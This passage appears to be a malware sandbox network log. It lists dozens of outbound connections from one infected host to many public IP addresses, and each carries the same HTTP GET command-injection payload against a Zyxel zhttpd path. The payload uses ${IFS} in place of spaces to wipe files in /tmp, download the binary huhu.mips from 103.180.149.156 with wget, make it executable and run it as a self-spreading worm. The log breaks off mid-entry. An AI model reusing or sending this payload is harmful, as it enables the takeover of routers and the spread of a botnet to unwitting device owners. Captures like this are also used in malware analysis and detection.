                                                        4840192.168.2.144263468.143.27.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967767000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4841192.168.2.144185679.76.64.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967814922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4842192.168.2.1443596146.185.108.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967845917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4843192.168.2.1444686142.66.41.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967896938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4844192.168.2.1449324199.127.105.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967932940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4845192.168.2.1438108192.10.65.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.967973948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4846192.168.2.144825298.65.171.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968010902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4847192.168.2.1452552146.26.187.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968053102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4848192.168.2.1448278128.68.4.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968091011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4849192.168.2.1450758139.13.47.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968126059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4850192.168.2.1451484115.10.108.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968170881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4851192.168.2.1453156131.55.87.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968223095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4852192.168.2.1437588123.138.193.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968257904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4853192.168.2.1444460203.146.168.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968305111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4854192.168.2.145362665.182.26.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968348980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4855192.168.2.1460630121.63.67.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968398094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4856192.168.2.1434288183.62.70.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968431950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4857192.168.2.1446842107.35.193.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968463898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4858192.168.2.145429860.39.233.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968514919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4859192.168.2.1438746143.234.217.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968543053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4860192.168.2.144179685.8.240.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968586922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4861192.168.2.1454808123.35.158.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968630075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4862192.168.2.145830468.240.221.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968674898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4863192.168.2.14514145.39.182.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968693972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4864192.168.2.1437844117.184.47.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968750954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4865192.168.2.1460450101.209.255.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968797922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4866192.168.2.143874254.159.113.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968828917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4867192.168.2.1453446178.77.0.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968866110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4868192.168.2.1454364128.128.253.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968903065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4869192.168.2.1435130187.233.98.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968950033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4870192.168.2.1453158146.157.24.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.968987942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4871192.168.2.143775296.112.20.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969014883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4872192.168.2.145144232.84.238.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969069004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4873192.168.2.1458234194.120.41.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969090939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4874192.168.2.1451938184.114.196.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969136000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4875192.168.2.1440746111.233.245.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969170094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4876192.168.2.1445096184.208.148.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969194889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4877192.168.2.1459522152.146.25.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969233990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4878192.168.2.1457174131.149.85.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969269991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4879192.168.2.145205440.28.8.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969326973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4880192.168.2.145760461.119.124.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969362020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4881192.168.2.1448556162.6.214.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969387054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4882192.168.2.1451250196.238.27.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969438076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4883192.168.2.145452242.229.151.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969481945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4884192.168.2.1455848181.132.249.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969497919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4885192.168.2.144224886.161.64.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969542980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4886192.168.2.1459316135.58.244.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969592094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4887192.168.2.143381486.65.181.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969624996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4888192.168.2.1442400113.17.78.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969674110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4889192.168.2.1439950128.197.249.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969701052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4890192.168.2.1450782178.240.31.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969732046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4891192.168.2.144098045.205.80.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969789982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4892192.168.2.144223274.179.250.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969822884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4893192.168.2.1447170198.104.22.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969880104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4894192.168.2.1435564178.82.5.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969912052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4895192.168.2.1437140117.246.229.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.969960928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4896192.168.2.1455802153.245.87.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970000029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4897192.168.2.1443352211.75.233.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970045090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4898192.168.2.143699286.178.233.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970083952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4899192.168.2.1436994100.199.49.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970122099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4900192.168.2.1457736186.138.131.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970153093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4901192.168.2.14519541.126.57.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970211983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4902192.168.2.1439126195.239.156.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:11.970256090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4903192.168.2.1440872223.151.129.126443
